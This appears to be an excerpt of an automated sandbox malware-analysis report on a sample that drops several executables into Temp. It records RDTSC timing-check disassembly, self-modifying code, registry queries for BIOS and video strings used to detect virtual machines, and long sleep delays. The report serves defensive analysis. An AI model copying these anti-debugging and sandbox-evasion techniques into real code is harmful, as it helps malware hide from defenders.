Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6058F second address: 4C60595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60485 second address: 4C6048B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048B second address: 4C6048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6048F second address: 4C60493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60493 second address: 4C604CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F0F34BEC154h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC157h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C604CC second address: 4C60507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C60507 second address: 4C6050B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6050B second address: 4C60511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C6029D second address: 4C602A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602A3 second address: 4C602A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602A9 second address: 4C602AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C602AD second address: 4C602CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319F5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70078 second address: 4C700AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f call 00007F0F34BEC14Fh 0x00000014 pop eax 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0ADE second address: 4CA0B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dl 0x00000005 pushfd 0x00000006 jmp 00007F0F345319EAh 0x0000000b jmp 00007F0F345319F5h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F0F345319EEh 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B1E second address: 4CA0B22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B22 second address: 4CA0B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0B26 second address: 4CA0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80161 second address: 4C80167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80167 second address: 4C8017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC150h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017B second address: 4C8017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C8017F second address: 4C801F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0F34BEC14Dh 0x00000012 sbb eax, 5C9434B6h 0x00000018 jmp 00007F0F34BEC151h 0x0000001d popfd 0x0000001e jmp 00007F0F34BEC150h 0x00000023 popad 0x00000024 and dword ptr [eax], 00000000h 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b pushfd 0x0000002c jmp 00007F0F34BEC14Ah 0x00000031 sbb ecx, 6ABEDF08h 0x00000037 jmp 00007F0F34BEC14Bh 0x0000003c popfd 0x0000003d popad 0x0000003e and dword ptr [eax+04h], 00000000h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 mov ecx, ebx 0x00000047 mov si, dx 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C801F4 second address: 4C801FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CD1 second address: 4C70CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CE2 second address: 4C70CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70CE6 second address: 4C70D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F34BEC153h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C70F85 second address: 4C70F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02B7 second address: 4CA02F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0F34BEC155h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02F2 second address: 4CA02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA02F8 second address: 4CA034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC150h 0x00000011 and eax, 1F647128h 0x00000017 jmp 00007F0F34BEC14Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ecx 0x0000001f jmp 00007F0F34BEC156h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0F34BEC14Eh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA034F second address: 4CA039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov al, 73h 0x0000000d movsx ebx, si 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 jmp 00007F0F345319F8h 0x0000001b test eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0F345319F7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA039E second address: 4CA03DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0FA6E7F6F1h 0x0000000f pushad 0x00000010 mov edi, esi 0x00000012 mov si, 8C8Fh 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0F34BEC151h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03DE second address: 4CA03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03FC second address: 4CA0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0400 second address: 4CA0406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0406 second address: 4CA0458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d jmp 00007F0F34BEC154h 0x00000012 pushfd 0x00000013 jmp 00007F0F34BEC152h 0x00000018 add ch, 00000028h 0x0000001b jmp 00007F0F34BEC14Bh 0x00000020 popfd 0x00000021 popad 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0458 second address: 4CA045C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA045C second address: 4CA0462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0462 second address: 4CA0468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0468 second address: 4CA046C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA046C second address: 4CA04BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007F0F345319F0h 0x0000000e retn 0004h 0x00000011 nop 0x00000012 mov esi, eax 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 xor esi, dword ptr [00A42014h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 call 00007F0F387D1DAEh 0x00000029 push FFFFFFFEh 0x0000002b pushad 0x0000002c mov ebx, 5E8B5FD0h 0x00000031 popad 0x00000032 pop eax 0x00000033 jmp 00007F0F345319EFh 0x00000038 ret 0x00000039 nop 0x0000003a push eax 0x0000003b call 00007F0F387D1DC1h 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 movzx eax, bx 0x00000046 call 00007F0F345319F1h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA04BB second address: 4CA0514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push esp 0x00000007 pushad 0x00000008 movzx ecx, bx 0x0000000b pushfd 0x0000000c jmp 00007F0F34BEC155h 0x00000011 sbb ecx, 31BDE066h 0x00000017 jmp 00007F0F34BEC151h 0x0000001c popfd 0x0000001d popad 0x0000001e mov dword ptr [esp], ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0F34BEC158h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0514 second address: 4CA051A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50050 second address: 4C5006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0F34BEC151h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5006F second address: 4C50084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50084 second address: 4C50094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC14Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50094 second address: 4C500A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500A9 second address: 4C500AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500AF second address: 4C500E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F0F345319EEh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0F345319EAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500E3 second address: 4C500F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C500F2 second address: 4C5011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007F0F345319EBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F345319F5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5011D second address: 4C50190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC157h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007F0F34BEC150h 0x00000013 pop esi 0x00000014 call 00007F0F34BEC14Bh 0x00000019 pop ecx 0x0000001a popad 0x0000001b push edx 0x0000001c mov edi, eax 0x0000001e pop ecx 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 jmp 00007F0F34BEC157h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0F34BEC155h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50190 second address: 4C50196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50196 second address: 4C5019A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5019A second address: 4C501A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501A8 second address: 4C501B9 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, D0h 0x00000008 popad 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501B9 second address: 4C501CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F345319EFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C501CC second address: 4C50211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [ebp+10h] 0x0000000e pushad 0x0000000f mov ecx, 5EA97883h 0x00000014 mov dh, ah 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0F34BEC157h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50211 second address: 4C50217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50217 second address: 4C5021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5021B second address: 4C50235 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50235 second address: 4C50239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50239 second address: 4C5023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50361 second address: 4C50370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC14Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C50370 second address: 4C5044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F0F345319F1h 0x00000012 test edx, 61000000h 0x00000018 jmp 00007F0F345319EEh 0x0000001d jne 00007F0FA680FCCCh 0x00000023 jmp 00007F0F345319F0h 0x00000028 test byte ptr [esi+48h], 00000001h 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F0F345319EEh 0x00000033 adc esi, 3FC30268h 0x00000039 jmp 00007F0F345319EBh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007F0F345319F8h 0x00000045 sub eax, 284FD4C8h 0x0000004b jmp 00007F0F345319EBh 0x00000050 popfd 0x00000051 popad 0x00000052 jne 00007F0FA680FC7Dh 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007F0F345319F4h 0x0000005f jmp 00007F0F345319F5h 0x00000064 popfd 0x00000065 mov bl, ah 0x00000067 popad 0x00000068 test bl, 00000007h 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e mov esi, 024CC12Bh 0x00000073 movzx eax, bx 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C5044E second address: 4C5046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F34BEC159h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BEF6B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C7C8EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CAF6B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D3C8EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 4A3277 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 2F608E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 4B442E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 53184C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: 8CFC3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: 8CFB5B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Special instruction interceptor: First address: B027A4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DE86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 831E84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 67DD93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 8D0B23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDE86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5F91E84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Special instruction interceptor: First address: 681E23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DDDD93 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 6030B23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Special instruction interceptor: First address: 5DE1E23 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4B90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 49B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4EA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 4FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Memory allocated: 6FC0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CC07D4 rdtsc 0_2_04CC07D4
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Window / User API: threadDelayed 526
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe API coverage: 3.8 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep count: 54 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696 Thread sleep time: -108054s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep count: 325 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7664 Thread sleep time: -9750000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 39 > 30 Jump to behavior
